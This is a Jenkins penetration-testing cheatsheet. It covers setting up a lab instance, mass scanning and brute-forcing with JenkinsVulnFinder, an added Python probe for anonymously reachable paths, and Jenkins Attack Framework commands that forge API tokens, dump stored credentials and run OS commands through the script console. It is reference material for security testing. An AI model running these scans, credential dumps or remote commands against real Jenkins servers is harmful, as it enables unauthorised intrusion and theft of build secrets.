Jenkins Penetration Testing Cheatsheet
This cheatsheet is designed to serve as a quick reference for penetration testers, security professionals, and DevSecOps practitioners seeking to evaluate the security of Jenkins instances effectively. It covers key attack vectors, misconfigurations, and potential vulnerabilities in Jenkins environments, along with tips for identifying and mitigating risks. Whether you're performing an in-depth penetration test or a quick security audit, this guide will help you navigate Jenkins' intricacies with precision.
Setting up Test Environment
#Jenkins needs a JDK before the service will start. Releases from 2.463 (weekly) / 2.479.1 (LTS) onward require Java 17 or newer; openjdk-11-jdk only works for older releases
sudo apt install openjdk-17-jdk
#Add the Jenkins Debian repository and its signing key
sudo wget -O /usr/share/keyrings/jenkins-keyring.asc \
  https://pkg.jenkins.io/debian/jenkins.io-2023.key
echo "deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc]" \
  https://pkg.jenkins.io/debian binary/ | sudo tee \
  /etc/apt/sources.list.d/jenkins.list > /dev/null
sudo apt-get update
sudo apt-get install jenkins
#Initial admin password (only readable as root or the jenkins user)
sudo cat /var/lib/jenkins/secrets/initialAdminPassword
#Access the server locally, or replace 127.0.0.1 with the server's IP address
http://127.0.0.1:8080
Jenkins Scanner
#Used to find Jenkins instances over the Internet/intranet (mass host discovery); download JenkinsScanner.sh from the JenkinsVulnFinder repository
#Start the scan; accessible Jenkins instances are saved to the given output file
./JenkinsScanner.sh -i ip_list.txt -p 80,443,8443,8080,8010,8090,8085 -o jenkins_instances.txt
#Download JenkinsVulnsFinder.py (use the raw URL; the github.com/.../blob/ page is HTML, not the script)
wget https://raw.githubusercontent.com/Bhanunamikaze/JenkinsVulnFinder/main/JenkinsVulnsFinder.py
#Run the scanner with anonymous access
python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --nocred
#Run the scanner with credentials
python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --cred username:password
#Run the scanner with brute-force enabled
python JenkinsVulnsFinder.py --url http://172.19.107.32:8080/ --nocred --brute --users users.txt --pass pass.txt
#Run the scanner with directory/path search; takes a wordlist file as input
python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --nocred --dirb wordlist.txt
python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --cred username:password --dirb wordlist.txt
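The scanners above fingerprint a host as Jenkins and then test what an anonymous user can reach. The following script is an added example of that logic, not code from JenkinsScanner or JenkinsVulnFinder. It assumes only Jenkins' standard HTTP surface: the X-Jenkins response header and the paths in CHECKS; the hostname in the usage comment is a placeholder. It distinguishes a real 200 from the login page Jenkins redirects anonymous users to, which is the mistake naive scanners make when they treat every 200 as "accessible".

```python
"""Fingerprint a Jenkins instance and test what anonymous users can reach.
Added example for this cheatsheet; it is not JenkinsScanner/JenkinsVulnFinder
code. It assumes only Jenkins' standard HTTP surface: the X-Jenkins response
header and the paths listed in CHECKS."""
import json
import sys
import urllib.error
import urllib.request

# Paths worth probing anonymously and why a tester cares about each (assumed standard).
CHECKS = {
    "/api/json": "job list readable without login",
    "/script": "Groovy script console (code execution as the Jenkins process)",
    "/computer/api/json": "agent names, labels and offline state",
    "/credentials/": "credential store listing",
    "/asynchPeople/": "user enumeration",
}


def http_get(url, timeout=8):
    """GET url and return (status, lower-cased header dict, body). Network errors map to status 0."""
    req = urllib.request.Request(url, headers={"User-Agent": "jenkins-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            headers = {k.lower(): v for k, v in r.headers.items()}
            return r.status, headers, r.read(1 << 20).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, {k.lower(): v for k, v in e.headers.items()}, ""
    except (urllib.error.URLError, OSError):
        return 0, {}, ""


def fingerprint(status, headers):
    """Jenkins stamps X-Jenkins: <version> on its responses, including 403s and the login page."""
    return headers.get("x-jenkins") if status else None


def probe(base, fetch=http_get):
    """Return {'version': str|None, 'jobs': [...], 'findings': {path: (status, note|None)}}.
    A path counts as reachable only on HTTP 200 without the login form: when anonymous
    lacks a permission Jenkins either answers 403 or redirects to /login (urllib follows
    the redirect, so the 200 we see is the login page, recognisable by its j_username field)."""
    base = base.rstrip("/")
    status, headers, _ = fetch(base + "/")
    out = {"version": fingerprint(status, headers), "jobs": [], "findings": {}}
    if out["version"] is None:
        return out  # not Jenkins, or unreachable
    for path, why in CHECKS.items():
        s, _, body = fetch(base + path)
        reachable = s == 200 and "j_username" not in body
        out["findings"][path] = (s, why if reachable else None)
        if path == "/api/json" and reachable:
            try:
                out["jobs"] = [j.get("name") for j in json.loads(body).get("jobs", [])]
            except ValueError:
                pass  # truncated or non-JSON body; the finding itself still stands
    return out


if __name__ == "__main__":
    # usage: python jenkins_probe.py http://172.19.107.32:8080 [more targets...]
    for target in sys.argv[1:]:
        r = probe(target)
        print(f"{target}: Jenkins {r['version']}" if r["version"] else f"{target}: no X-Jenkins header")
        for path, (s, note) in r["findings"].items():
            print(f"  {s:>3} {path:<20} {note or 'not reachable anonymously'}")
        if r["jobs"]:
            print("  jobs:", ", ".join(r["jobs"]))
```

Feed it the hosts JenkinsScanner.sh wrote out; an instance whose /script is reachable anonymously is already a code-execution finding, no credentials needed.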
Jenkins Attack Framework
#Installation
git clone https://github.com/Accenture/jenkins-attack-framework.git
cd jenkins-attack-framework
chmod +x jaf
#Install dependencies: run one of the two, with sudo for a system-wide install or without it for the current user only
sudo ./jaf --install
./jaf --install
#Check access; credentials are user:password (or user:APItoken). If none are provided, anonymous access is tried
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a User:user
#Authenticate with a session cookie instead of a password, appending the crumb after a "|" (the crumb is only needed when CSRF protection is enabled)
#Useful when the instance only allows SSO logins and you hold a browser session
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a "JSESSIONID.b56cceb4=node01gv13h0gw8msto7tpp82pv499.node0|crumb=74366885010b4471c265872d42bcf5767773698bab0b49dc09d48dd8bfa0725e"
# View console output for the last build of every job that the user can see
python jaf.py ConsoleOutput -s http://172.19.107.32:8080/ -a User:user
#Create an API token for the authenticating user (needs a valid login; the token then works for Basic auth without a crumb)
python jaf.py CreateAPIToken -s http://172.19.107.32:8080/ -a User:user
#Create an API token on behalf of user `Bhanu` (requires administrative credentials)
python jaf.py CreateAPIToken -s http://172.19.107.32:8080/ -a User:user --user Bhanu
#Dump stored credentials (requires administrative credentials with /script access)
python jaf.py DumpCreds -s http://172.19.107.32:8080/ -a Bhanu:Bhanu
#List API tokens for a given user (requires administrative credentials with /script access)
python jaf.py ListAPITokens -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User
#List jobs
python jaf.py ListJobs -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User
#Run an OS command through the script console (requires administrative credentials with /script access)
python jaf.py RunCommand whoami -s http://172.19.107.32:8080/ -a Bhanu:Bhanu